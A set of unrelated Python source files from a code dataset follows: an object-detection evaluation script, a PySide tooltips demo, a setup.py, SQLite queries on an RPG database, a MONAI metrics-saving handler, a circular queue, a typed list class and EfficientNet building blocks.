'<gt_dir>/cstopp_train.tfrecord,'
'<gt_dir>/cstopp_test.tfrecord'
'<gt_dir>/cstopp_val.tfrecord')
tf.app.flags.DEFINE_string('det_dir', '', 'Location of root directory for the '
'inference data. Folder structure is assumed to be:'
'<det_dir>/cstopp_train.tfrecord,'
'<det_dir>/cstopp_test.tfrecord'
'<det_dir>/cstopp_val.tfrecord')
tf.app.flags.DEFINE_string('output_dir', '', 'Path to which metrics'
'will be written.')
tf.app.flags.DEFINE_string('split', 'train', 'Data split when record file is being read from gt_dir and det_dir ex: train, test, val')
tf.app.flags.DEFINE_string(
'label_map_path',
'configs/cstopp_label_map.pbtxt',
'file path for the labels')
tf.app.flags.DEFINE_integer(
'num_class', 1,
'Number of Classes to consider from 1 in the label map')
tf.app.flags.DEFINE_boolean(
'is_vout', False, 'Generate a video with bounding boxes')
FLAGS = tf.app.flags.FLAGS
gt_feature = {
'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),
'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),
'image/object/class/label': tf.VarLenFeature(tf.int64),
'image/filename': tf.FixedLenFeature([], tf.string),
'image/object/difficult': tf.VarLenFeature(tf.int64),
}
det_feature = {
'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),
'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),
'image/object/class/label': tf.VarLenFeature(tf.int64),
'image/object/score': tf.VarLenFeature(tf.float32),
'image/filename': tf.FixedLenFeature([], tf.string),
}
class Reader:
def __init__(self, record_path, split, is_infer=False):
data_path = []
if is_infer:
data_path.append(os.path.join(record_path, 'cstopp_inference_{}.tfrecord'.format(split)))
else:
data_path.append(os.path.join(record_path, 'cstopp_{}.tfrecord'.format(split)))
self.read_graph = tf.Graph()
with self.read_graph.as_default():
# old_graph_def = tf.GraphDef()
self.filename_queue = tf.train.string_input_producer(data_path)
self.reader = tf.TFRecordReader()
self.num_records = 0
for f in data_path:
self.num_records += sum(1 for _ in tf.python_io.tf_record_iterator(f))
# tf.import_graph_def(old_graph_def, name='')
self.sess = tf.Session(graph=self.read_graph)
def get_field(self, field, decode=False):
if not decode:
if type(self.features[field])==tf.SparseTensor:
return tf.sparse_tensor_to_dense(self.features[field])
else:
return self.features[field]
else:
return tf.image.decode_png(self.features[field])
def get_fields(self, feature_dict):
# Modify graph to add these ops
with self.read_graph.as_default():
list_fields = feature_dict.keys()
# old_graph_def = tf.GraphDef()
# Read next record from queue
_, serialized_example = self.reader.read(self.filename_queue)
self.features = tf.parse_single_example(
serialized_example, features=feature_dict)
# Get required fields from record
fields_out = [self.get_field(f) for f in list_fields]
# Close queue
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=self.sess, coord=coord)
# Import updated graph in current read_graph
# tf.import_graph_def(old_graph_def, name='')
eval_out = self.sess.run(fields_out)
out_dict = dict(zip(list_fields, eval_out))
return out_dict
def get_bbox(box_list):
ymin_eval = box_list['image/object/bbox/ymin']
xmin_eval = box_list['image/object/bbox/xmin']
ymax_eval = box_list['image/object/bbox/ymax']
xmax_eval = box_list['image/object/bbox/xmax']
return np.vstack((ymin_eval,xmin_eval,ymax_eval,xmax_eval)).T
def write_metrics(metrics, output_path):
"""Write metrics to the output directory.
Args:
metrics: A dictionary containing metric names and values.
output_dir: Directory to write metrics to.
"""
tf.logging.info('Writing metrics.')
with open(output_path, 'w') as csvfile:
metrics_writer = csv.writer(csvfile, delimiter=',')
for metric_name, metric_value in metrics.items():
metrics_writer.writerow([metric_name, str(metric_value)])
def evaluate(gt_dir=FLAGS.gt_dir, det_dir=FLAGS.det_dir,
output_dir=FLAGS.output_dir, split='train',
label_map_path=None, is_vout=False, num_class=1, fps_out=5):
gt_reader = Reader(gt_dir, split)
num_records = gt_reader.num_records
det_reader = Reader(det_dir, split, is_infer=True)
label_map = label_map_util.load_labelmap(label_map_path)
categories = label_map_util.convert_label_map_to_categories(
label_map,
max_num_classes=num_class,
use_display_name=True)
evaluator = obj_eval.ObjectDetectionEvaluator(categories)
output_path = os.path.join(output_dir, 'cstopp_{}_eval.csv'.format(split))
if is_vout:
category_index = label_map_util.create_category_index(categories)
list_valid_ids = [int(cat_dict['id']) for cat_dict in categories]
vwriter = FFmpegWriter(os.path.join(output_dir,split+'_det_gt.mp4'),
inputdict={'-r':str(fps_out)},
outputdict={'-r':str(fps_out)})
for image_num in range(0, num_records):
print('Evaluating {}/{}'.format(image_num+1,num_records))
gt_fields = gt_reader.get_fields(gt_feature)
gt_bbox = get_bbox(gt_fields)
gt_classes = gt_fields['image/object/class/label'].astype(np.int32)
gt_diff = gt_fields['image/object/difficult']
det_fields = det_reader.get_fields(det_feature)
det_bbox = get_bbox(det_fields)
det_scores = det_fields['image/object/score']
det_classes = det_fields['image/object/class/label'].astype(np.int32)
filename = gt_fields['image/filename']
ground_dict = {
standard_fields.InputDataFields.groundtruth_boxes: gt_bbox,
standard_fields.InputDataFields.groundtruth_classes: gt_classes,
standard_fields.InputDataFields.groundtruth_difficult: gt_diff}
det_dict = {
standard_fields.DetectionResultFields.detection_boxes: det_bbox,
standard_fields.DetectionResultFields.detection_scores: det_scores,
standard_fields.DetectionResultFields.detection_classes: det_classes}
if is_vout:
image = imread(filename)
# Visualization of the results of a detection.
image_labeled = np.copy(image)
vis_util.visualize_boxes_and_labels_on_image_array(
image_labeled,
gt_bbox,
gt_classes,
None,
category_index,
max_boxes_to_draw=None,
min_score_thresh=0,
use_normalized_coordinates=True,
line_thickness=2)
idx_consider = [cid in list_valid_ids for cid in det_classes]
vis_util.visualize_boxes_and_labels_on_image_array(
image_labeled,
det_bbox[idx_consider,:],
det_classes[idx_consider],
det_scores[idx_consider],
category_index,
max_boxes_to_draw=None,
min_score_thresh=0,
use_normalized_coordinates=True,
line_thickness=2)
vwriter.writeFrame(image_labeled)
evaluator.add_single_ground_truth_image_info(filename, ground_dict)
evaluator.add_single_detected_image_info(filename, det_dict)
eval_result = evaluator.evaluate()
print(eval_result)
write_metrics(eval_result, output_path)
if is_vout:
vwriter.close()
if __name__ == '__main__':
evaluate(
gt_dir=FLAGS.gt_dir,
det_dir=FLAGS.det_dir,
output_dir=FLAGS.output_dir,
split=FLAGS.split,
label_map_path=FLAGS.label_map_path,
is_vout=FLAGS.is_vout,
num_class=FLAGS.num_class)
|
StarcoderdataPython
|
6618062
|
<reponame>heylenz/python27<gh_stars>10-100
#!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2004-2005 Trolltech AS. All rights reserved.
##
## This file is part of the example classes of the Qt Toolkit.
##
## This file may be used under the terms of the GNU General Public
## License version 2.0 as published by the Free Software Foundation
## and appearing in the file LICENSE.GPL included in the packaging of
## this file. Please review the following information to ensure GNU
## General Public Licensing requirements will be met:
## http://www.trolltech.com/products/qt/opensource.html
##
## If you are unsure which license is appropriate for your use, please
## review the following information:
## http://www.trolltech.com/products/qt/licensing.html or contact the
## sales department at <EMAIL>.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import random
from PySide import QtCore, QtGui
import tooltips_rc
class ShapeItem(object):
def __init__(self):
self.myPath = QtGui.QPainterPath()
self.myPosition = QtCore.QPoint()
self.myColor = QtGui.QColor()
self.myToolTip = ''
def path(self):
return self.myPath
def position(self):
return self.myPosition
def color(self):
return self.myColor
def toolTip(self):
return self.myToolTip
def setPath(self, path):
self.myPath = path
def setToolTip(self, toolTip):
self.myToolTip = toolTip
def setPosition(self, position):
self.myPosition = position
def setColor(self, color):
self.myColor = color
class SortingBox(QtGui.QWidget):
circle_count = square_count = triangle_count = 1
def __init__(self):
super(SortingBox, self).__init__()
self.circlePath = QtGui.QPainterPath()
self.squarePath = QtGui.QPainterPath()
self.trianglePath = QtGui.QPainterPath()
self.shapeItems = []
self.previousPosition = QtCore.QPoint()
self.setMouseTracking(True)
self.setBackgroundRole(QtGui.QPalette.Base)
self.itemInMotion = None
self.newCircleButton = self.createToolButton("New Circle",
QtGui.QIcon(':/images/circle.png'), self.createNewCircle)
self.newSquareButton = self.createToolButton("New Square",
QtGui.QIcon(':/images/square.png'), self.createNewSquare)
self.newTriangleButton = self.createToolButton("New Triangle",
QtGui.QIcon(':/images/triangle.png'), self.createNewTriangle)
self.circlePath.addEllipse(0, 0, 100, 100)
self.squarePath.addRect(0, 0, 100, 100)
x = self.trianglePath.currentPosition().x()
y = self.trianglePath.currentPosition().y()
self.trianglePath.moveTo(x + 120 / 2, y)
self.trianglePath.lineTo(0, 100)
self.trianglePath.lineTo(120, 100)
self.trianglePath.lineTo(x + 120 / 2, y)
self.setWindowTitle("Tooltips")
self.resize(500, 300)
self.createShapeItem(self.circlePath, "Circle",
self.initialItemPosition(self.circlePath),
self.initialItemColor())
self.createShapeItem(self.squarePath, "Square",
self.initialItemPosition(self.squarePath),
self.initialItemColor())
self.createShapeItem(self.trianglePath, "Triangle",
self.initialItemPosition(self.trianglePath),
self.initialItemColor())
def event(self, event):
if event.type() == QtCore.QEvent.ToolTip:
helpEvent = event
index = self.itemAt(helpEvent.pos())
if index != -1:
QtGui.QToolTip.showText(helpEvent.globalPos(),
self.shapeItems[index].toolTip())
else:
QtGui.QToolTip.hideText()
event.ignore()
return True
return super(SortingBox, self).event(event)
def resizeEvent(self, event):
margin = self.style().pixelMetric(QtGui.QStyle.PM_DefaultTopLevelMargin)
x = self.width() - margin
y = self.height() - margin
y = self.updateButtonGeometry(self.newCircleButton, x, y)
y = self.updateButtonGeometry(self.newSquareButton, x, y)
self.updateButtonGeometry(self.newTriangleButton, x, y)
def paintEvent(self, event):
painter = QtGui.QPainter(self)
painter.setRenderHint(QtGui.QPainter.Antialiasing)
for shapeItem in self.shapeItems:
painter.translate(shapeItem.position())
painter.setBrush(shapeItem.color())
painter.drawPath(shapeItem.path())
painter.translate(-shapeItem.position())
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
index = self.itemAt(event.pos())
if index != -1:
self.itemInMotion = self.shapeItems[index]
self.previousPosition = event.pos()
value = self.shapeItems[index]
del self.shapeItems[index]
self.shapeItems.insert(len(self.shapeItems) - 1, value)
self.update()
def mouseMoveEvent(self, event):
if (event.buttons() & QtCore.Qt.LeftButton) and self.itemInMotion:
self.moveItemTo(event.pos())
def mouseReleaseEvent(self, event):
if (event.button() == QtCore.Qt.LeftButton) and self.itemInMotion:
self.moveItemTo(event.pos())
self.itemInMotion = None
def createNewCircle(self):
SortingBox.circle_count += 1
self.createShapeItem(self.circlePath,
"Circle <%d>" % SortingBox.circle_count,
self.randomItemPosition(), self.randomItemColor())
def createNewSquare(self):
SortingBox.square_count += 1
self.createShapeItem(self.squarePath,
"Square <%d>" % SortingBox.square_count,
self.randomItemPosition(), self.randomItemColor())
def createNewTriangle(self):
SortingBox.triangle_count += 1
self.createShapeItem(self.trianglePath,
"Triangle <%d>" % SortingBox.triangle_count,
self.randomItemPosition(), self.randomItemColor())
def itemAt(self, pos):
for i in range(len(self.shapeItems) - 1, -1, -1):
item = self.shapeItems[i]
if item.path().contains(QtCore.QPointF(pos - item.position())):
return i
return -1
def moveItemTo(self, pos):
offset = pos - self.previousPosition
self.itemInMotion.setPosition(self.itemInMotion.position() + offset)
self.previousPosition = QtCore.QPoint(pos)
self.update()
def updateButtonGeometry(self, button, x, y):
size = button.sizeHint()
button.setGeometry(x - size.width(), y - size.height(),
size.width(), size.height())
return y - size.height() - self.style().pixelMetric(QtGui.QStyle.PM_DefaultLayoutSpacing)
def createShapeItem(self, path, toolTip, pos, color):
shapeItem = ShapeItem()
shapeItem.setPath(path)
shapeItem.setToolTip(toolTip)
shapeItem.setPosition(pos)
shapeItem.setColor(color)
self.shapeItems.append(shapeItem)
self.update()
def createToolButton(self, toolTip, icon, member):
button = QtGui.QToolButton(self)
button.setToolTip(toolTip)
button.setIcon(icon)
button.setIconSize(QtCore.QSize(32, 32))
button.clicked.connect(member)
return button
def initialItemPosition(self, path):
y = (self.height() - path.controlPointRect().height()) / 2
if len(self.shapeItems) == 0:
x = ((3 * self.width()) / 2 - path.controlPointRect().width()) / 2
else:
x = (self.width() / len(self.shapeItems) - path.controlPointRect().width()) / 2
return QtCore.QPoint(x, y)
def randomItemPosition(self):
x = random.randint(0, self.width() - 120)
y = random.randint(0, self.height() - 120)
return QtCore.QPoint(x, y)
def initialItemColor(self):
hue = ((len(self.shapeItems) + 1) * 85) % 256
return QtGui.QColor.fromHsv(hue, 255, 190)
def randomItemColor(self):
return QtGui.QColor.fromHsv(random.randint(0, 256), 255, 190)
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
sortingBox = SortingBox()
sortingBox.show()
sys.exit(app.exec_())
|
StarcoderdataPython
|
9632252
|
<gh_stars>0
#!/usr/bin/env python3
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
# requirements.txt Notes
# Create requirements.txt file command: pip freeze > requirements.txt
# Install requirements.txt file command: pip -r install requirements.txt
# Utility function to read REQUIREMENTS.txt inside a virtual env
# Parses requirements.txt into a list of requirements for the install_requires option.
def requires(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
content = f.readlines()
content = [x.strip() for x in content] #Takes /n off each line
return content
setup(
name='text-sentiment',
version='0.1.0',
packages=find_packages(exclude=['tests',]),
install_requires=requires('requirements.txt'), #All modules associated with package
license='Public Domain',
long_description=read('README'),
#url='https://example.com', #To github
#download_url='https://example.com', #Tarball download
author='<NAME>',
author_email='<EMAIL>'
entry_points={
'console_scripts': ['text-sentiment=text_sentiment.app:main'],
},
)
|
StarcoderdataPython
|
1625224
|
import sqlite3
# establish a connection with the desired database
conn = sqlite3.connect('rpg_db.sqlite3')
conn # (optional) test the output
# create a cursor -> curs = conn.cursor() -> see loop below
# query for the total number of characters
query = 'SELECT COUNT(DISTINCT character_id) FROM charactercreator_character;'
# queries for the number of characters per subclass
query2a = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_necromancer ON character_id = mage_ptr_id'
query2b = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_mage ON character_id = character_ptr_id'
query2c = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_cleric ON character_id = character_ptr_id'
query2d = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_fighter ON character_id = character_ptr_id'
query2e = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_theif ON character_id = character_ptr_id'
# query for the total number of items
query3 = 'SELECT COUNT(item_id) FROM charactercreator_character_inventory;'
# query for the total number of weapons
query4 = 'SELECT COUNT(*) FROM armory_item INNER JOIN armory_weapon ON item_id = item_ptr_id;'
# query for the number of items held by each character
query5 = 'SELECT character_id, COUNT(item_id) FROM charactercreator_character_inventory GROUP BY character_id LIMIT 20'
# query for the number of weapons held by each character
query6 = 'SELECT character_id, COUNT(item_id) FROM charactercreator_character_inventory INNER JOIN armory_weapon ON item_id = item_ptr_id GROUP BY character_id LIMIT 20;'
# query for the average number of items held by characters
query7 = 'SELECT AVG(count) FROM(SELECT COUNT(item_id) AS count FROM charactercreator_character_inventory GROUP BY character_id);'
# query for the average number of weapons held by characters
query8 = 'SELECT AVG(count) FROM(SELECT COUNT(item_id) AS count FROM charactercreator_character_inventory INNER JOIN armory_weapon ON item_id = item_ptr_id GROUP BY character_id);'
# execute the queries; 'define-a-function' route show below
queries = [query, query2a, query2b,
query2c, query2d, query2e, query3,
query4, query5, query6, query7, query8
]
|
StarcoderdataPython
|
195106
|
<reponame>tatuanb/monai_V1
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING, Callable, List, Optional, Sequence, Union
from monai.config import IgniteInfo
from monai.data import decollate_batch
from monai.handlers.utils import write_metrics_reports
from monai.utils import ImageMetaKey as Key
from monai.utils import ensure_tuple, min_version, optional_import, string_list_all_gather
Events, _ = optional_import("ignite.engine", IgniteInfo.OPT_IMPORT_VERSION, min_version, "Events")
idist, _ = optional_import("ignite", IgniteInfo.OPT_IMPORT_VERSION, min_version, "distributed")
if TYPE_CHECKING:
from ignite.engine import Engine
else:
Engine, _ = optional_import("ignite.engine", IgniteInfo.OPT_IMPORT_VERSION, min_version, "Engine")
class MetricsSaver:
"""
ignite handler to save metrics values and details into expected files.
Args:
save_dir: directory to save the metrics and metric details.
metrics: expected final metrics to save into files, can be: None, "*" or list of strings.
None - don't save any metrics into files.
"*" - save all the existing metrics in `engine.state.metrics` dict into separate files.
list of strings - specify the expected metrics to save.
default to "*" to save all the metrics into `metrics.csv`.
metric_details: expected metric details to save into files, the data comes from
`engine.state.metric_details`, which should be provided by different `Metrics`,
typically, it's some intermediate values in metric computation.
for example: mean dice of every channel of every image in the validation dataset.
it must contain at least 2 dims: (batch, classes, ...),
if not, will unsqueeze to 2 dims.
this arg can be: None, "*" or list of strings.
None - don't save any metric_details into files.
"*" - save all the existing metric_details in `engine.state.metric_details` dict into separate files.
list of strings - specify the metric_details of expected metrics to save.
if not None, every metric_details array will save a separate `{metric name}_raw.csv` file.
batch_transform: a callable that is used to extract the `meta_data` dictionary of
the input images from `ignite.engine.state.batch` if saving metric details. the purpose is to get the
input filenames from the `meta_data` and store with metric details together.
`engine.state` and `batch_transform` inherit from the ignite concept:
https://pytorch.org/ignite/concepts.html#state, explanation and usage example are in the tutorial:
https://github.com/Project-MONAI/tutorials/blob/master/modules/batch_output_transform.ipynb.
summary_ops: expected computation operations to generate the summary report.
it can be: None, "*" or list of strings, default to None.
None - don't generate summary report for every expected metric_details.
"*" - generate summary report for every metric_details with all the supported operations.
list of strings - generate summary report for every metric_details with specified operations, they
should be within list: ["mean", "median", "max", "min", "<int>percentile", "std", "notnans"].
the number in "<int>percentile" should be [0, 100], like: "15percentile". default: "90percentile".
for more details, please check: https://numpy.org/doc/stable/reference/generated/numpy.nanpercentile.html.
note that: for the overall summary, it computes `nanmean` of all classes for each image first,
then compute summary. example of the generated summary report::
class mean median max 5percentile 95percentile notnans
class0 6.0000 6.0000 7.0000 5.1000 6.9000 2.0000
class1 6.0000 6.0000 6.0000 6.0000 6.0000 1.0000
mean 6.2500 6.2500 7.0000 5.5750 6.9250 2.0000
save_rank: only the handler on specified rank will save to files in multi-gpus validation, default to 0.
delimiter: the delimiter character in CSV file, default to "\t".
output_type: expected output file type, supported types: ["csv"], default to "csv".
"""
def __init__(
self,
save_dir: str,
metrics: Optional[Union[str, Sequence[str]]] = "*",
metric_details: Optional[Union[str, Sequence[str]]] = None,
batch_transform: Callable = lambda x: x,
summary_ops: Optional[Union[str, Sequence[str]]] = None,
save_rank: int = 0,
delimiter: str = "\t",
output_type: str = "csv",
) -> None:
self.save_dir = save_dir
self.metrics = ensure_tuple(metrics) if metrics is not None else None
self.metric_details = ensure_tuple(metric_details) if metric_details is not None else None
self.batch_transform = batch_transform
self.summary_ops = ensure_tuple(summary_ops) if summary_ops is not None else None
self.save_rank = save_rank
self.deli = delimiter
self.output_type = output_type
self._filenames: List[str] = []
def attach(self, engine: Engine) -> None:
"""
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
engine.add_event_handler(Events.EPOCH_STARTED, self._started)
engine.add_event_handler(Events.ITERATION_COMPLETED, self._get_filenames)
engine.add_event_handler(Events.EPOCH_COMPLETED, self)
def _started(self, _engine: Engine) -> None:
"""
Initialize internal buffers.
Args:
_engine: Ignite Engine, unused argument.
"""
self._filenames = []
def _get_filenames(self, engine: Engine) -> None:
if self.metric_details is not None:
meta_data = self.batch_transform(engine.state.batch)
if isinstance(meta_data, dict):
# decollate the `dictionary of list` to `list of dictionaries`
meta_data = decollate_batch(meta_data)
for m in meta_data:
self._filenames.append(f"{m.get(Key.FILENAME_OR_OBJ)}")
def __call__(self, engine: Engine) -> None:
"""
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
ws = idist.get_world_size()
if self.save_rank >= ws:
raise ValueError("target save rank is greater than the distributed group size.")
# all gather file names across ranks
_images = string_list_all_gather(strings=self._filenames) if ws > 1 else self._filenames
# only save metrics to file in specified rank
if idist.get_rank() == self.save_rank:
_metrics = {}
if self.metrics is not None and len(engine.state.metrics) > 0:
_metrics = {k: v for k, v in engine.state.metrics.items() if k in self.metrics or "*" in self.metrics}
_metric_details = {}
if hasattr(engine.state, "metric_details"):
details = engine.state.metric_details # type: ignore
if self.metric_details is not None and len(details) > 0:
for k, v in details.items():
if k in self.metric_details or "*" in self.metric_details:
_metric_details[k] = v
write_metrics_reports(
save_dir=self.save_dir,
images=None if len(_images) == 0 else _images,
metrics=_metrics,
metric_details=_metric_details,
summary_ops=self.summary_ops,
deli=self.deli,
output_type=self.output_type,
)
|
StarcoderdataPython
|
6412617
|
N = int(input())
D, X = map(int, input().split())
A = [int(input()) for _ in range(N)]
ans = X
for a in A:
if D % a == 0:
ans -= 1
ans += 1 + D // a
print(ans)
|
StarcoderdataPython
|
3447504
|
""" Enhanced functions for list. This enhanced list is
strictly typed """
from typing import Generic, TypeVar, Iterable, List
# generics datatype
Type = TypeVar("T")
class EnhancedList(list, Generic[Type]):
""" extends list of a gerneric type """
def __init__(self, *args: Iterable[Type]):
""" create a list type """
list.__init__(self, *args)
def __getitem__(self, key):
""" receive one or multiple elements from list.
If the key argument is of type "list" then this
function returns a EnhancedList, the stored value else
Arguments:
key: int, List[int] or List[List[int]]
Returns:
value: EnhancedList or EnhancedList element
"""
if isinstance(key, list):
return EnhancedList([self[i] for i in key])
return list.__getitem__(self, key)
def reject_indices(self, indices: List[int]):
""" remove the elements utilizing a list
Arguments:
indices: List[int]
Returns:
list without rejected elements: EnhancedList
"""
tmp_list = []
for i, elem in enumerate(self):
if i not in indices:
tmp_list.append(elem)
return EnhancedList(tmp_list)
|
StarcoderdataPython
|
17806
|
"""
A fixed-capacity queue implemented as circular queue.
Queue can become full.
* enqueue is O(1)
* dequeue is O(1)
"""
class Queue:
"""
Implementation of a Queue using a circular buffer.
"""
def __init__(self, size):
self.size = size
self.storage = [None] * size
self.first = 0
self.last = 0
self.N = 0
def is_empty(self):
"""
Determine if queue is empty.
"""
return self.N == 0
def is_full(self):
"""
Determine if queue is full.
"""
return self.N == self.size
def enqueue(self, item):
"""
Enqueue new item to end of queue.
"""
if self.is_full():
raise RuntimeError('Queue is full')
self.storage[self.last] = item
self.N += 1
self.last = (self.last + 1) % self.size
def dequeue(self):
"""
Remove and return first item from queue.
"""
if self.is_empty():
raise RuntimeError('Queue is empty')
val = self.storage[self.first]
self.N -= 1
self.first = (self.first + 1) % self.size
return val
|
StarcoderdataPython
|
6620245
|
""" EfficientNet, MobileNetV3, etc Blocks
Hacked together by / Copyright 2020 <NAME>
"""
import math
import torch
import torch.nn as nn
from torch.nn import functional as F
from .layers import create_conv2d, drop_path, get_act_layer
from .layers.activations import sigmoid
# Defaults used for Google/Tensorflow training of mobile networks /w RMSprop as per
# papers and TF reference implementations. PT momentum equiv for TF decay is (1 - TF decay)
# NOTE: momentum varies btw .99 and .9997 depending on source
# .99 in official TF TPU impl
# .9997 (/w .999 in search space) for paper
BN_MOMENTUM_TF_DEFAULT = 1 - 0.99
BN_EPS_TF_DEFAULT = 1e-3
_BN_ARGS_TF = dict(momentum=BN_MOMENTUM_TF_DEFAULT, eps=BN_EPS_TF_DEFAULT)
def get_bn_args_tf():
return _BN_ARGS_TF.copy()
def resolve_bn_args(kwargs):
bn_args = get_bn_args_tf() if kwargs.pop('bn_tf', False) else {}
bn_momentum = kwargs.pop('bn_momentum', None)
if bn_momentum is not None:
bn_args['momentum'] = bn_momentum
bn_eps = kwargs.pop('bn_eps', None)
if bn_eps is not None:
bn_args['eps'] = bn_eps
return bn_args
_SE_ARGS_DEFAULT = dict(
gate_fn=sigmoid,
act_layer=None,
reduce_mid=False,
divisor=1)
def resolve_se_args(kwargs, in_chs, act_layer=None):
se_kwargs = kwargs.copy() if kwargs is not None else {}
# fill in args that aren't specified with the defaults
for k, v in _SE_ARGS_DEFAULT.items():
se_kwargs.setdefault(k, v)
# some models, like MobilNetV3, calculate SE reduction chs from the containing block's mid_ch instead of in_ch
if not se_kwargs.pop('reduce_mid'):
se_kwargs['reduced_base_chs'] = in_chs
# act_layer override, if it remains None, the containing block's act_layer will be used
if se_kwargs['act_layer'] is None:
assert act_layer is not None
se_kwargs['act_layer'] = act_layer
return se_kwargs
def resolve_act_layer(kwargs, default='relu'):
act_layer = kwargs.pop('act_layer', default)
if isinstance(act_layer, str):
act_layer = get_act_layer(act_layer)
return act_layer
def make_divisible(v, divisor=8, min_value=None):
min_value = min_value or divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
def round_channels(channels, multiplier=1.0, divisor=8, channel_min=None):
"""Round number of filters based on depth multiplier."""
if not multiplier:
return channels
channels *= multiplier
return make_divisible(channels, divisor, channel_min)
class ChannelShuffle(nn.Module):
# FIXME haven't used yet
def __init__(self, groups):
super(ChannelShuffle, self).__init__()
self.groups = groups
def forward(self, x):
"""Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,w] -> [N,C,H,W]"""
N, C, H, W = x.size()
g = self.groups
assert C % g == 0, "Incompatible group size {} for input channel {}".format(
g, C
)
return (
x.view(N, g, int(C / g), H, W)
.permute(0, 2, 1, 3, 4)
.contiguous()
.view(N, C, H, W)
)
class SqueezeExcite(nn.Module):
def __init__(self, in_chs, se_ratio=0.25, reduced_base_chs=None,
act_layer=nn.ReLU, gate_fn=sigmoid, divisor=1, **_):
super(SqueezeExcite, self).__init__()
reduced_chs = make_divisible((reduced_base_chs or in_chs) * se_ratio, divisor)
self.conv_reduce = nn.Conv2d(in_chs, reduced_chs, 1, bias=True)
self.act1 = act_layer(inplace=True)
self.conv_expand = nn.Conv2d(reduced_chs, in_chs, 1, bias=True)
self.gate_fn = gate_fn
def forward(self, x):
x_se = x.mean((2, 3), keepdim=True)
x_se = self.conv_reduce(x_se)
x_se = self.act1(x_se)
x_se = self.conv_expand(x_se)
return x * self.gate_fn(x_se)
class ConvBnAct(nn.Module):
def __init__(self, in_chs, out_chs, kernel_size,
stride=1, dilation=1, pad_type='', act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d, norm_kwargs=None):
super(ConvBnAct, self).__init__()
norm_kwargs = norm_kwargs or {}
self.conv = create_conv2d(in_chs, out_chs, kernel_size, stride=stride, dilation=dilation, padding=pad_type)
self.bn1 = norm_layer(out_chs, **norm_kwargs)
self.act1 = act_layer(inplace=True)
def feature_info(self, location):
if location == 'expansion': # output of conv after act, same as block coutput
info = dict(module='act1', hook_type='forward', num_chs=self.conv.out_channels)
else: # location == 'bottleneck', block output
info = dict(module='', hook_type='', num_chs=self.conv.out_channels)
return info
def forward(self, x):
x = self.conv(x)
x = self.bn1(x)
x = self.act1(x)
return x
class DepthwiseSeparableConv(nn.Module):
""" DepthwiseSeparable block
Used for DS convs in MobileNet-V1 and in the place of IR blocks that have no expansion
(factor of 1.0). This is an alternative to having a IR with an optional first pw conv.
"""
def __init__(self, in_chs, out_chs, dw_kernel_size=3,
stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
pw_kernel_size=1, pw_act=False, se_ratio=0., se_kwargs=None,
norm_layer=nn.BatchNorm2d, norm_kwargs=None, drop_path_rate=0.):
super(DepthwiseSeparableConv, self).__init__()
norm_kwargs = norm_kwargs or {}
has_se = se_ratio is not None and se_ratio > 0.
self.has_residual = (stride == 1 and in_chs == out_chs) and not noskip
self.has_pw_act = pw_act # activation after point-wise conv
self.drop_path_rate = drop_path_rate
self.conv_dw = create_conv2d(
in_chs, in_chs, dw_kernel_size, stride=stride, dilation=dilation, padding=pad_type, depthwise=True)
self.bn1 = norm_layer(in_chs, **norm_kwargs)
self.act1 = act_layer(inplace=True)
# Squeeze-and-excitation
if has_se:
se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
self.se = SqueezeExcite(in_chs, se_ratio=se_ratio, **se_kwargs)
else:
self.se = None
self.conv_pw = create_conv2d(in_chs, out_chs, pw_kernel_size, padding=pad_type)
self.bn2 = norm_layer(out_chs, **norm_kwargs)
self.act2 = act_layer(inplace=True) if self.has_pw_act else nn.Identity()
def feature_info(self, location):
if location == 'expansion': # after SE, input to PW
info = dict(module='conv_pw', hook_type='forward_pre', num_chs=self.conv_pw.in_channels)
else: # location == 'bottleneck', block output
info = dict(module='', hook_type='', num_chs=self.conv_pw.out_channels)
return info
def forward(self, x):
residual = x
x = self.conv_dw(x)
x = self.bn1(x)
x = self.act1(x)
if self.se is not None:
x = self.se(x)
x = self.conv_pw(x)
x = self.bn2(x)
x = self.act2(x)
if self.has_residual:
if self.drop_path_rate > 0.:
x = drop_path(x, self.drop_path_rate, self.training)
x += residual
return x
